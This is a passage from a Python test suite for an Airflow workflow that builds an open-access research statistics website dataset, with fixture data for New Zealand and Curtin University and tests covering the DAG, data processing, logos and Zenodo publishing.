\"10\",\n \"n_outputs_domain\": \"27\",\n \"n_outputs_institution\": \"0\",\n \"n_outputs_public\": \"0\",\n \"n_outputs_other_internet\": \"0\",\n \"repositories\": repositories,\n },\n ]\n self.institution_index = [\n {\n \"id\": \"https://ror.org/02n415q13\",\n \"name\": \"Curtin University\",\n \"url\": \"https://curtin.edu.au/\",\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/Curtin_University\",\n \"country_code\": 
\"AUS\",\n \"country_name\": \"Australia\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"institution_type\": \"Education\",\n \"acronyms\": [],\n },\n ]\n self.institution_data = [\n {\n \"id\": \"https://ror.org/02n415q13\",\n \"year\": 2020,\n \"n_citations\": \"121\",\n \"n_outputs\": \"100\",\n \"n_outputs_open\": \"48\",\n \"n_outputs_publisher_open\": \"37\",\n \"n_outputs_publisher_open_only\": \"11\",\n \"n_outputs_both\": \"26\",\n \"n_outputs_other_platform_open\": \"37\",\n \"n_outputs_other_platform_open_only\": \"11\",\n \"n_outputs_closed\": \"52\",\n \"n_outputs_black\": \"90\",\n \"n_outputs_oa_journal\": \"19\",\n \"n_outputs_hybrid\": \"10\",\n \"n_outputs_no_guarantees\": \"8\",\n \"n_outputs_preprint\": \"10\",\n \"n_outputs_domain\": \"27\",\n \"n_outputs_institution\": \"0\",\n \"n_outputs_public\": \"0\",\n \"n_outputs_other_internet\": \"0\",\n \"repositories\": repositories,\n },\n {\n \"id\": \"https://ror.org/02n415q13\",\n \"year\": 2021,\n \"n_citations\": \"233\",\n \"n_outputs\": \"100\",\n \"n_outputs_open\": \"45\",\n \"n_outputs_publisher_open\": \"37\",\n \"n_outputs_publisher_open_only\": \"14\",\n \"n_outputs_both\": \"23\",\n \"n_outputs_other_platform_open\": \"31\",\n \"n_outputs_other_platform_open_only\": \"8\",\n \"n_outputs_closed\": \"55\",\n \"n_outputs_black\": \"90\",\n \"n_outputs_oa_journal\": \"20\",\n \"n_outputs_hybrid\": \"9\",\n \"n_outputs_no_guarantees\": \"8\",\n \"n_outputs_preprint\": \"10\",\n \"n_outputs_domain\": \"27\",\n \"n_outputs_institution\": \"0\",\n \"n_outputs_public\": \"0\",\n \"n_outputs_other_internet\": \"0\",\n \"repositories\": repositories,\n },\n ]\n self.entities = [\n (\"country\", self.country_index, self.country_data, [\"NZL\"]),\n (\"institution\", self.institution_index, self.institution_data, [\"02n415q13\"]),\n ]\n\n ####################################\n # Test workflow with Airflow\n ####################################\n\n def test_dag_structure(self):\n \"\"\"Test that the DAG has the correct structure.\"\"\"\n\n env = ObservatoryEnvironment(enable_api=False)\n with env.create():\n dag = OaWebWorkflow(\n dag_id=self.dag_id,\n cloud_workspace=env.cloud_workspace,\n data_bucket=self.data_bucket_name,\n conceptrecid=self.conceptrecid,\n ).make_dag()\n self.assert_dag_structure(\n {\n \"doi_sensor\": [\"check_dependencies\"],\n \"check_dependencies\": [\"query\"],\n \"query\": [\"download\"],\n \"download\": [\"make_draft_zenodo_version\"],\n \"make_draft_zenodo_version\": [\"download_assets\"],\n \"download_assets\": [\"preprocess_data\"],\n \"preprocess_data\": [\"build_indexes\"],\n \"build_indexes\": [\"download_logos\"],\n \"download_logos\": [\"download_wiki_descriptions\"],\n \"download_wiki_descriptions\": [\"build_datasets\"],\n \"build_datasets\": [\"publish_zenodo_version\"],\n \"publish_zenodo_version\": [\"upload_dataset\"],\n \"upload_dataset\": [\"repository_dispatch\"],\n \"repository_dispatch\": [\"cleanup\"],\n \"cleanup\": [],\n },\n dag,\n )\n\n def test_dag_load(self):\n \"\"\"Test that the DAG can be loaded from a DAG bag.\"\"\"\n\n # Test successful\n env = ObservatoryEnvironment(\n workflows=[\n Workflow(\n dag_id=self.dag_id,\n name=\"Open Access Website Workflow\",\n class_name=\"academic_observatory_workflows.workflows.oa_web_workflow.OaWebWorkflow\",\n cloud_workspace=self.fake_cloud_workspace,\n kwargs=dict(\n data_bucket=self.data_bucket_name,\n conceptrecid=self.conceptrecid,\n ),\n )\n ]\n )\n\n with env.create():\n 
self.assert_dag_load_from_config(self.dag_id)\n\n # Test required kwargs\n env = ObservatoryEnvironment(\n workflows=[\n Workflow(\n dag_id=self.dag_id,\n name=\"Open Access Website Workflow\",\n class_name=\"academic_observatory_workflows.workflows.oa_web_workflow.OaWebWorkflow\",\n cloud_workspace=self.fake_cloud_workspace,\n kwargs=dict(),\n )\n ]\n )\n\n with env.create():\n with self.assertRaises(AssertionError) as cm:\n self.assert_dag_load_from_config(self.dag_id)\n msg = cm.exception.args[0]\n self.assertTrue(\"missing 2 required keyword-only arguments\" in msg)\n self.assertTrue(\"data_bucket\" in msg)\n self.assertTrue(\"conceptrecid\" in msg)\n\n def setup_tables(\n self, dataset_id_all: str, dataset_id_settings: str, bucket_name: str, snapshot_date: pendulum.DateTime\n ):\n ror = load_jsonl(test_fixtures_folder(\"doi\", \"ror.jsonl\"))\n country = load_jsonl(test_fixtures_folder(self.oa_web_fixtures, \"country.jsonl.gz\"))\n institution = load_jsonl(test_fixtures_folder(self.oa_web_fixtures, \"institution.jsonl.gz\"))\n settings_country = load_jsonl(test_fixtures_folder(\"doi\", \"country.jsonl\"))\n\n oa_web_schema_path = test_fixtures_folder(self.oa_web_fixtures, \"schema\")\n with CliRunner().isolated_filesystem() as t:\n tables = [\n Table(\n \"ror\",\n True,\n dataset_id_all,\n ror,\n bq_find_schema(\n path=os.path.join(schema_folder(), \"ror\"), table_name=\"ror\", release_date=snapshot_date\n ),\n ),\n Table(\n \"country\",\n True,\n dataset_id_all,\n country,\n bq_find_schema(path=oa_web_schema_path, table_name=\"country\"),\n ),\n Table(\n \"institution\",\n True,\n dataset_id_all,\n institution,\n bq_find_schema(path=oa_web_schema_path, table_name=\"institution\"),\n ),\n Table(\n \"country\",\n False,\n dataset_id_settings,\n settings_country,\n bq_find_schema(path=os.path.join(schema_folder(), \"doi\"), table_name=\"country\"),\n ),\n ]\n\n bq_load_tables(\n project_id=self.project_id,\n tables=tables,\n bucket_name=bucket_name,\n snapshot_date=snapshot_date,\n )\n\n @patch(\"academic_observatory_workflows.workflows.oa_web_workflow.Zenodo\")\n @patch(\"academic_observatory_workflows.workflows.oa_web_workflow.trigger_repository_dispatch\")\n def test_telescope(self, mock_trigger_repository_dispatch, mock_zenodo):\n \"\"\"Test the telescope end to end.\"\"\"\n\n mock_zenodo.return_value = MockZenodo()\n execution_date = pendulum.datetime(2021, 11, 14)\n snapshot_date = pendulum.datetime(2021, 11, 21)\n env = ObservatoryEnvironment(project_id=self.project_id, data_location=self.data_location, enable_api=False)\n bq_dataset_id = env.add_dataset(\"data\")\n bq_dataset_id_settings = env.add_dataset(\"settings\")\n data_bucket = env.add_bucket()\n github_token = \"github-token\"\n zenodo_token = \"zenodo-token\"\n\n with env.create() as t:\n # Run fake DOI workflow to test sensor\n dag = make_dummy_dag(\"doi\", execution_date)\n with env.create_dag_run(dag, execution_date):\n # Running all of a DAGs tasks sets the DAG to finished\n ti = env.run_task(\"dummy_task\")\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Setup dependencies\n # Upload fake data to BigQuery\n self.setup_tables(\n dataset_id_all=bq_dataset_id,\n dataset_id_settings=bq_dataset_id_settings,\n bucket_name=env.download_bucket,\n snapshot_date=snapshot_date,\n )\n\n # Upload fake cached zip files file to bucket\n for file_name in [\"images-base.zip\", \"images.zip\"]:\n file_path = test_fixtures_folder(\"oa_web_workflow\", file_name)\n gcs_upload_file(bucket_name=data_bucket, blob_name=file_name, 
file_path=file_path)\n\n # Setup workflow and connections\n workflow = OaWebWorkflow(\n dag_id=self.dag_id,\n cloud_workspace=env.cloud_workspace,\n data_bucket=data_bucket,\n conceptrecid=self.conceptrecid,\n bq_ror_dataset_id=bq_dataset_id,\n bq_agg_dataset_id=bq_dataset_id,\n bq_settings_dataset_id=bq_dataset_id_settings,\n )\n dag = workflow.make_dag()\n env.add_connection(Connection(conn_id=workflow.github_conn_id, uri=f\"http://:{github_token}@\"))\n env.add_connection(Connection(conn_id=workflow.zenodo_conn_id, uri=f\"http://:{zenodo_token}@\"))\n\n # Run workflow\n with env.create_dag_run(dag, execution_date) as dag_run:\n # Mocked and expected data\n release = OaWebRelease(\n dag_id=self.dag_id,\n run_id=dag_run.run_id,\n snapshot_date=snapshot_date,\n )\n\n # DOI Sensor\n ti = env.run_task(\"doi_sensor\")\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Check dependencies\n ti = env.run_task(workflow.check_dependencies.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Run query\n ti = env.run_task(workflow.query.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Download data\n ti = env.run_task(workflow.download.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n expected_file_names = [\n \"country-index.jsonl.gz\",\n \"institution-index.jsonl.gz\",\n \"country-data-000000000000.jsonl.gz\",\n \"institution-data-000000000000.jsonl.gz\",\n ]\n for file_name in expected_file_names:\n path = os.path.join(release.download_folder, file_name)\n self.assertTrue(os.path.isfile(path))\n\n # Make draft Zenodo version\n ti = env.run_task(workflow.make_draft_zenodo_version.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Download cached assets\n ti = env.run_task(workflow.download_assets.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n expected_file_names = [\n \"images.zip\",\n \"images-base.zip\",\n ]\n for file_name in expected_file_names:\n path = os.path.join(release.download_folder, file_name)\n self.assertTrue(os.path.isfile(path))\n\n # Preprocess data\n ti = env.run_task(workflow.preprocess_data.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n expected_file_names = [\n \"country-data.jsonl.gz\",\n \"institution-data.jsonl.gz\",\n ]\n for file_name in expected_file_names:\n path = os.path.join(release.transform_folder, \"intermediate\", file_name)\n self.assertTrue(os.path.isfile(path))\n\n # Build indexes\n ti = env.run_task(workflow.build_indexes.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n expected_file_names = [\n \"country-index.jsonl.gz\",\n \"institution-index.jsonl.gz\",\n ]\n for file_name in expected_file_names:\n path = os.path.join(release.transform_folder, \"intermediate\", file_name)\n self.assertTrue(os.path.isfile(path))\n\n # Download logos\n ti = env.run_task(workflow.download_logos.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Download wiki descriptions\n ti = env.run_task(workflow.download_wiki_descriptions.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n\n # Build datasets\n ti = env.run_task(workflow.build_datasets.__name__)\n self.assertEqual(State.SUCCESS, ti.state)\n build_folder = os.path.join(release.transform_folder, \"build\")\n expected_files = make_expected_build_files(build_folder)\n print(\"Checking expected transformed files\")\n for file in expected_files:\n print(f\"\\t{file}\")\n self.assertTrue(os.path.isfile(file))\n\n # Check that full dataset zip file exists\n archives = [\"data.zip\", \"images.zip\", \"coki-oa-dataset.zip\"]\n for file_name in archives:\n 
latest_file = os.path.join(release.transform_folder, \"out\", file_name)\n                    print(f\"\\t{latest_file}\")\n                    self.assertTrue(os.path.isfile(latest_file))\n\n                # Publish Zenodo version\n                ti = env.run_task(workflow.publish_zenodo_version.__name__)\n                self.assertEqual(State.SUCCESS, ti.state)\n\n                # Upload data to bucket\n                ti = env.run_task(workflow.upload_dataset.__name__)\n                self.assertEqual(State.SUCCESS, ti.state)\n                blob_name = f\"{workflow.version}/data.zip\"\n                self.assert_blob_exists(data_bucket, blob_name)\n                blob_name = f\"{workflow.version}/images.zip\"\n                self.assert_blob_exists(data_bucket, blob_name)\n\n                # Trigger repository dispatch: assert_any_call makes these real assertions\n                # (called_once_with is not a Mock assert method and silently does nothing)\n                ti = env.run_task(workflow.repository_dispatch.__name__)\n                self.assertEqual(State.SUCCESS, ti.state)\n                mock_trigger_repository_dispatch.assert_any_call(github_token, \"data-update/develop\")\n                mock_trigger_repository_dispatch.assert_any_call(github_token, \"data-update/staging\")\n                mock_trigger_repository_dispatch.assert_any_call(github_token, \"data-update/production\")\n\n                # Test that all workflow data deleted\n                ti = env.run_task(workflow.cleanup.__name__)\n                self.assertEqual(State.SUCCESS, ti.state)\n                self.assert_cleanup(release.workflow_folder)\n\n    ####################################\n    # Test workflow functions\n    ####################################\n\n    def save_mock_data(self, path: str, test_data):\n        with jsonlines.open(path, mode=\"w\") as writer:\n            writer.write_all(test_data)\n        df = pd.DataFrame(test_data)\n        return df\n\n    def test_load_data_glob(self):\n        with CliRunner().isolated_filesystem() as t:\n            path = os.path.join(t, \"data-000000000000.jsonl.gz\")\n            save_jsonl_gz(path, [{\"name\": \"Jim\"}, {\"name\": \"David\"}, {\"name\": \"Jane\"}])\n\n            path = os.path.join(t, \"data-000000000001.jsonl.gz\")\n            save_jsonl_gz(path, [{\"name\": \"Joe\"}, {\"name\": \"Blogs\"}, {\"name\": \"Daniels\"}])\n\n            # Compare\n            expected = [\n                {\"name\": \"Jim\"},\n                {\"name\": \"David\"},\n                {\"name\": \"Jane\"},\n                {\"name\": \"Joe\"},\n                {\"name\": \"Blogs\"},\n                {\"name\": \"Daniels\"},\n            ]\n\n            actual = load_data_glob(os.path.join(t, \"data-*.jsonl.gz\"))\n            self.assertEqual(expected, actual)\n\n    def test_load_data(self):\n        entity_type = \"country\"\n        with CliRunner().isolated_filesystem() as t:\n            # Save Data\n            path = os.path.join(t, f\"{entity_type}-index.jsonl\")\n            df = self.save_mock_data(path, self.country_index)\n\n            # Load jsonl\n            actual_df = load_data(path)\n\n            # Compare\n            expected_countries = df.to_dict(\"records\")\n            actual_countries = actual_df.to_dict(\"records\")\n            self.assertEqual(expected_countries, actual_countries)\n\n    def test_update_df_with_percentages(self):\n        keys = [(\"hello\", \"n_outputs\"), (\"world\", \"n_outputs\")]\n        df = pd.DataFrame([{\"n_hello\": 20, \"n_world\": 50, \"n_outputs\": 100}])\n        update_df_with_percentages(df, keys)\n        expected = {\"n_hello\": 20, \"n_world\": 50, \"n_outputs\": 100, \"p_hello\": 20, \"p_world\": 50}\n        actual = df.to_dict(orient=\"records\")[0]\n        self.assertEqual(expected, actual)\n\n    def test_make_index_df(self):\n        with CliRunner().isolated_filesystem() as t:\n            # Country\n            entity_type = \"country\"\n            df_index, df_data = load_index_and_data(entity_type, self.country_index, self.country_data)\n\n            expected = [\n                {\n                    \"alpha2\": \"NZ\",\n                    \"entity_type\": \"country\",\n                    \"id\": \"NZL\",\n                    \"name\": \"New Zealand\",\n                    \"wikipedia_url\": \"https://en.wikipedia.org/wiki/New_Zealand\",\n                    \"subregion\": \"Australia and New Zealand\",\n                    \"region\": \"Oceania\",\n                    \"n_citations\": 354,\n                    \"n_outputs\": 200,\n                    
\"n_outputs_open\": 93,\n \"n_outputs_publisher_open\": 74,\n \"n_outputs_publisher_open_only\": 25,\n \"n_outputs_both\": 49,\n \"n_outputs_other_platform_open\": 68,\n \"n_outputs_other_platform_open_only\": 19,\n \"n_outputs_closed\": 107,\n \"n_outputs_black\": 180.0,\n \"n_outputs_oa_journal\": 39,\n \"n_outputs_hybrid\": 19,\n \"n_outputs_no_guarantees\": 16,\n \"n_outputs_preprint\": 20,\n \"n_outputs_domain\": 54,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 46.5,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 12.5,\n \"p_outputs_both\": 24.5,\n \"p_outputs_other_platform_open\": 34.0,\n \"p_outputs_other_platform_open_only\": 9.5,\n \"p_outputs_closed\": 53.5,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 52.702702702702695,\n \"p_outputs_hybrid\": 25.675675675675674,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 29.411764705882355,\n \"p_outputs_domain\": 79.41176470588235,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n }\n ]\n print(\"Checking country records:\")\n actual = df_index.to_dict(\"records\")\n for e, a in zip(expected, actual):\n self.assertDictEqual(e, a)\n\n # Institution\n entity_type = \"institution\"\n df_index, df_data = load_index_and_data(entity_type, self.institution_index, self.institution_data)\n expected = [\n {\n \"entity_type\": \"institution\",\n \"id\": \"02n415q13\",\n \"name\": \"Curtin University\",\n \"url\": \"https://curtin.edu.au/\",\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/Curtin_University\",\n \"country_code\": \"AUS\",\n \"country_name\": \"Australia\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"institution_type\": \"Education\",\n \"n_citations\": 354,\n \"n_outputs\": 200,\n \"n_outputs_open\": 93,\n \"n_outputs_publisher_open\": 74,\n \"n_outputs_publisher_open_only\": 25,\n \"n_outputs_both\": 49,\n \"n_outputs_other_platform_open\": 68,\n \"n_outputs_other_platform_open_only\": 19,\n \"n_outputs_closed\": 107,\n \"n_outputs_black\": 180,\n \"n_outputs_oa_journal\": 39,\n \"n_outputs_hybrid\": 19,\n \"n_outputs_no_guarantees\": 16,\n \"n_outputs_preprint\": 20,\n \"n_outputs_domain\": 54,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 46.5,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 12.5,\n \"p_outputs_both\": 24.5,\n \"p_outputs_other_platform_open\": 34.0,\n \"p_outputs_other_platform_open_only\": 9.5,\n \"p_outputs_closed\": 53.5,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 52.702702702702695,\n \"p_outputs_hybrid\": 25.675675675675674,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 29.411764705882355,\n \"p_outputs_domain\": 79.41176470588235,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n \"acronyms\": [],\n }\n ]\n\n print(\"Checking institution records:\")\n actual = df_index.to_dict(\"records\")\n for e, a in zip(expected, actual):\n self.assertDictEqual(e, a)\n\n def test_update_index_with_logos(self):\n with CliRunner().isolated_filesystem() as t:\n sizes = [\"sm\", \"md\", \"lg\"]\n\n # Country table\n entity_type = \"country\"\n df_index, _ = load_index_and_data(entity_type, self.country_index, self.country_data)\n update_index_with_logos(t, entity_type, df_index)\n\n for i, row in 
df_index.iterrows():\n for size in sizes:\n # Check that logo key created\n key = f\"logo_{size}\"\n self.assertTrue(key in row)\n\n # Redirect to md size\n if size == \"lg\":\n size = \"md\"\n\n # Check that correct logo path exists\n item_id = row[\"id\"]\n expected_path = f\"logos/{entity_type}/{size}/{item_id}.svg\"\n actual_path = row[key]\n self.assertEqual(expected_path, actual_path)\n\n # Institution table\n entity_type = \"institution\"\n institution_index = self.institution_index + [\n {\n \"id\": \"https://ror.org/12345\",\n \"name\": \"Foo University\",\n \"country_name\": \"Australia\",\n \"country_code\": \"AUS\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"url\": None,\n \"wikipedia_url\": None,\n \"institution_type\": \"Education\",\n }\n ]\n institution_data = self.institution_data + [\n {\n \"id\": \"https://ror.org/12345\",\n \"year\": 2020,\n \"n_citations\": \"121\",\n \"n_outputs\": \"100\",\n \"n_outputs_open\": \"48\",\n \"n_outputs_publisher_open\": \"37\",\n \"n_outputs_publisher_open_only\": \"11\",\n \"n_outputs_both\": \"26\",\n \"n_outputs_other_platform_open\": \"37\",\n \"n_outputs_other_platform_open_only\": \"11\",\n \"n_outputs_closed\": \"52\",\n \"n_outputs_black\": \"90\",\n \"n_outputs_oa_journal\": \"19\",\n \"n_outputs_hybrid\": \"10\",\n \"n_outputs_no_guarantees\": \"8\",\n },\n ]\n\n # Create index\n df_index, _ = load_index_and_data(entity_type, institution_index, institution_data)\n sizes = [\"sm\", \"md\", \"lg\"]\n with vcr.use_cassette(test_fixtures_folder(\"oa_web_workflow\", \"test_make_logos.yaml\")):\n df_index = update_index_with_logos(t, entity_type, df_index)\n curtin_row = df_index[df_index[\"id\"] == \"02n415q13\"].iloc[0]\n foo_row = df_index[df_index[\"id\"] == \"12345\"].iloc[0]\n for size in sizes:\n # Check that logo was added to dataframe\n key = f\"logo_{size}\"\n self.assertTrue(key in curtin_row)\n self.assertTrue(key in foo_row)\n\n # Check that correct path created\n item_id = curtin_row[\"id\"]\n fmt = \"jpg\"\n if size == \"lg\":\n fmt = \"png\"\n expected_curtin_path = f\"logos/{entity_type}/{size}/{item_id}.{fmt}\"\n expected_foo_path = f\"unknown.svg\"\n self.assertEqual(expected_curtin_path, curtin_row[key])\n self.assertEqual(expected_foo_path, foo_row[key])\n\n # Check that downloaded logo exists\n full_path = os.path.join(t, \"images\", expected_curtin_path)\n self.assertTrue(os.path.isfile(full_path))\n\n def test_save_index_df(self):\n with CliRunner().isolated_filesystem() as t:\n for entity_type, index, data, entity_ids in self.entities:\n # Load index\n df_index = pd.DataFrame(index)\n preprocess_index_df(entity_type, df_index)\n\n # Load data\n df_data = pd.DataFrame(data)\n preprocess_data_df(entity_type, df_data)\n\n # Make index\n df_index = make_index_df(entity_type, df_index, df_data)\n update_index_with_logos(t, entity_type, df_index)\n\n # Make entities\n entities = make_entities(entity_type, df_index, df_data)\n\n # Save index from entities\n data_path = os.path.join(t, \"data\")\n os.makedirs(data_path, exist_ok=True)\n file_path = os.path.join(data_path, f\"{entity_type}.json\")\n data = make_index(entity_type, entities)\n save_json(file_path, data)\n self.assertTrue(os.path.isfile(file_path))\n\n def test_make_entities(self):\n with CliRunner().isolated_filesystem() as t:\n # Country\n entity_type = \"country\"\n\n # Load index\n df_index = pd.DataFrame(self.country_index)\n preprocess_index_df(entity_type, df_index)\n\n # Load data\n df_data = 
pd.DataFrame(self.country_data)\n preprocess_data_df(entity_type, df_data)\n\n # Make index and entities\n df_index = make_index_df(entity_type, df_index, df_data)\n entities = make_entities(entity_type, df_index, df_data)\n\n repositories = [\n {\"id\": \"PubMed Central\", \"total_outputs\": 30, \"category\": \"Domain\", \"home_repo\": False},\n {\"id\": \"Europe PMC\", \"total_outputs\": 24, \"category\": \"Domain\", \"home_repo\": False},\n {\"id\": \"arXiv\", \"total_outputs\": 20, \"category\": \"Preprint\", \"home_repo\": False},\n ]\n expected = [\n {\n \"id\": \"NZL\",\n \"name\": \"New Zealand\",\n \"entity_type\": entity_type,\n \"description\": {\n \"license\": Description.license,\n \"text\": None,\n \"url\": \"https://en.wikipedia.org/wiki/New_Zealand\",\n },\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/New_Zealand\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"end_year\": 2021,\n \"start_year\": 2020,\n \"stats\": {\n \"n_citations\": 354,\n \"n_outputs\": 200,\n \"n_outputs_open\": 93,\n \"n_outputs_publisher_open\": 74,\n \"n_outputs_publisher_open_only\": 25,\n \"n_outputs_both\": 49,\n \"n_outputs_other_platform_open\": 68,\n \"n_outputs_other_platform_open_only\": 19,\n \"n_outputs_closed\": 107,\n \"n_outputs_black\": 180,\n \"n_outputs_oa_journal\": 39,\n \"n_outputs_hybrid\": 19,\n \"n_outputs_no_guarantees\": 16,\n \"n_outputs_preprint\": 20,\n \"n_outputs_domain\": 54,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 46.5,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 12.5,\n \"p_outputs_both\": 24.5,\n \"p_outputs_other_platform_open\": 34.0,\n \"p_outputs_other_platform_open_only\": 9.5,\n \"p_outputs_closed\": 53.5,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 52.702702702702695,\n \"p_outputs_hybrid\": 25.675675675675674,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 29.411764705882355,\n \"p_outputs_domain\": 79.41176470588235,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n \"years\": [\n {\n \"year\": 2020,\n \"date\": \"2020-12-31\",\n \"stats\": {\n \"n_citations\": 121,\n \"n_outputs\": 100,\n \"n_outputs_open\": 48,\n \"n_outputs_publisher_open\": 37,\n \"n_outputs_publisher_open_only\": 11,\n \"n_outputs_both\": 26,\n \"n_outputs_other_platform_open\": 37,\n \"n_outputs_other_platform_open_only\": 11,\n \"n_outputs_closed\": 52,\n \"n_outputs_black\": 90,\n \"n_outputs_oa_journal\": 19,\n \"n_outputs_hybrid\": 10,\n \"n_outputs_no_guarantees\": 8,\n \"n_outputs_preprint\": 10,\n \"n_outputs_domain\": 27,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 48.0,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 11.0,\n \"p_outputs_both\": 26.0,\n \"p_outputs_other_platform_open\": 37.0,\n \"p_outputs_other_platform_open_only\": 11.0,\n \"p_outputs_closed\": 52.0,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 51.35135135135135,\n \"p_outputs_hybrid\": 27.027027027027028,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 27.027027027027028,\n \"p_outputs_domain\": 72.97297297297297,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n },\n {\n \"year\": 2021,\n \"date\": \"2021-12-31\",\n \"stats\": {\n \"n_citations\": 233,\n \"n_outputs\": 
100,\n \"n_outputs_open\": 45,\n \"n_outputs_publisher_open\": 37,\n \"n_outputs_publisher_open_only\": 14,\n \"n_outputs_both\": 23,\n \"n_outputs_other_platform_open\": 31,\n \"n_outputs_other_platform_open_only\": 8,\n \"n_outputs_closed\": 55,\n \"n_outputs_black\": 90,\n \"n_outputs_oa_journal\": 20,\n \"n_outputs_hybrid\": 9,\n \"n_outputs_no_guarantees\": 8,\n \"n_outputs_preprint\": 10,\n \"n_outputs_domain\": 27,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 45.0,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 14.000000000000002,\n \"p_outputs_both\": 23.0,\n \"p_outputs_other_platform_open\": 31.0,\n \"p_outputs_other_platform_open_only\": 8.0,\n \"p_outputs_closed\": 55.00000000000001,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 54.054054054054056,\n \"p_outputs_hybrid\": 24.324324324324326,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 32.25806451612903,\n \"p_outputs_domain\": 87.09677419354838,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n },\n ],\n \"repositories\": repositories,\n }\n ]\n\n for e_dict, a_entity in zip(expected, entities):\n a_dict = a_entity.to_dict()\n self.assertDictEqual(e_dict, a_dict)\n\n # Institution\n entity_type = \"institution\"\n\n # Load index\n df_index = pd.DataFrame(self.institution_index)\n preprocess_index_df(entity_type, df_index)\n\n # Load data\n df_data = pd.DataFrame(self.institution_data)\n preprocess_data_df(entity_type, df_data)\n\n # Make index and entities\n df_index = make_index_df(entity_type, df_index, df_data)\n entities = make_entities(entity_type, df_index, df_data)\n\n expected = [\n {\n \"id\": \"02n415q13\",\n \"name\": \"Curtin University\",\n \"country_code\": \"AUS\",\n \"country_name\": \"Australia\",\n \"description\": {\n \"license\": Description.license,\n \"text\": None,\n \"url\": \"https://en.wikipedia.org/wiki/Curtin_University\",\n },\n \"entity_type\": entity_type,\n \"url\": \"https://curtin.edu.au/\",\n \"wikipedia_url\": \"https://en.wikipedia.org/wiki/Curtin_University\",\n \"subregion\": \"Australia and New Zealand\",\n \"region\": \"Oceania\",\n \"institution_type\": \"Education\",\n \"end_year\": 2021,\n \"start_year\": 2020,\n \"stats\": {\n \"n_citations\": 354,\n \"n_outputs\": 200,\n \"n_outputs_open\": 93,\n \"n_outputs_publisher_open\": 74,\n \"n_outputs_publisher_open_only\": 25,\n \"n_outputs_both\": 49,\n \"n_outputs_other_platform_open\": 68,\n \"n_outputs_other_platform_open_only\": 19,\n \"n_outputs_closed\": 107,\n \"n_outputs_black\": 180,\n \"n_outputs_oa_journal\": 39,\n \"n_outputs_hybrid\": 19,\n \"n_outputs_no_guarantees\": 16,\n \"n_outputs_preprint\": 20,\n \"n_outputs_domain\": 54,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 46.5,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 12.5,\n \"p_outputs_both\": 24.5,\n \"p_outputs_other_platform_open\": 34.0,\n \"p_outputs_other_platform_open_only\": 9.5,\n \"p_outputs_closed\": 53.5,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 52.702702702702695,\n \"p_outputs_hybrid\": 25.675675675675674,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 29.411764705882355,\n \"p_outputs_domain\": 79.41176470588235,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n 
